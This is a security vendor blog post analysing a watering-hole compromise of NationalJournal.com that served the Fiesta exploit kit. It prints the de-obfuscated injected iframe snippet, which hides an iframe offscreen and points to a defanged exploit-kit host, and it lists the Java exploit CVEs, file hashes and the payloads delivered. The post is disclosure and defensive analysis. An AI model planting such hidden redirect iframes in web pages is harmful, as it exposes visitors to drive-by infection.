KIA: NationalJournal.com Pushing Malware Through Fiesta EK - Killed with Invincea

Home/KIA/KIA: NationalJournal.com Pushing Malware Through Fiesta EK – Killed with Invincea
KIA NationalJournal.com Pushing Malware Through Fiesta EK - Killed with Invincea

Today, we noticed an interesting infection in our cloud based Threat Data Server indicating that malware was being served by www.nationaljournal.com.  Naturally, we decided to investigate with an Invincea protected browser. What we found (yes, Ma…malware) was somewhat surprising given the disclosure by The National Journal on March 7th that they were aware of this happening previously/had hired a third party to investigate and remediate. Invincea’s Eddie Mitchell went to take a look (as we often do) using our protected browsing environment and sure enough this is what he found.

A clever redirect has been added to the very top of the main index page that creates an iframe pointing to an exploit pack landing page:

 

After de-obfuscating the javascript, an iframe is revealed leading to an exploit pack:

<style>.qcpy44g7i { position:absolute; left:-1424px; top:-1436px} </style> <div><iframe src=”hxxp://yxlfetf[.]myftp[.]biz/awnsmzzxwb9szmwu/180984399f58463670d71c3d8ee47459/” width=”229″ height=”133″></iframe></div>
As seen in Invincea:

Redirection:

Main exploit pack landing page (appears to be Fiesta/NeoSploit pack based on URL pattern):

Java exploit served via malicious archive (.jar) file.  In our testing with Java 6 Update 20, we received two JAR files:

D8LSqmud.jar (md5: 43613edc5964032e80fadaf45519bec7) – CVE-2012-0507

qEwGH1uZ.jar (md5: d9555f36bf664c2e8abc8b97bbe6938d) – CVE-2012-1723

Malware delivered:

 

The malware downloads both a variant of the ZeroAccess rootkit as well as a FakeAV.  Samples observed are located here:

https://www.virustotal.com/en/file/2d92ab0314e9bb9106dba2d98993ce020de52409db7de245d9bc615c07752557/analysis/

https://www.virustotal.com/en/file/ac54235a351689788b72f476f685aa45c756309ad64509a1e265cd56d2de3b10/analysis/

Screenshot from Invincea infection analysis:

During the course of our analysis, we also noticed that the landing page was redirecting users with a more recent version of Java to a serialized Java object hosted at koxhrcnr[.]myvnc[.]com.  As discussed on the following page (http://malware.dontneedcoffee.com/2013/02/cve-2013-0431-java-17-update-11.html), Java object serialization is implemented to bypass the interactive user access control implemented in Java 7 Update 11.

 

Request for serialized Java object (hKWsNJGe.ser md5: 40ab9a01962f276f91ed038f7b4fa70c):

However, the subsequent request for a Java class file (bub.class – presumably an exploit for CVE-2013-0431) was met with a 404 response:

So what does the fact that such a reputable site has (as far as we can tell) twice been hijacked to push malware in the last 7 days? Is The National Journal on an island in terms of being the only legitimate website to push malware? HARDLY - NBC.Com, The Council on Foreign Relations, Speedtest.net all were used previously…and the list continues to grow. What this tells us (as if we didn’t already know) is that the bad guys are increasingly going to the watering hole to attack their targets. This is happening every single day of the week. Why is it happening? Because the endpoint has become the new perimeter and the user the primary target for breach. Whether targeted in nature or attack of opportunity…go after the employee if you want access to the enterprise.

Users in bubbles – highly targeted applications in secure virtual containers…the evidence just continues to pile up that this is a necessary approach.

Leave a Comment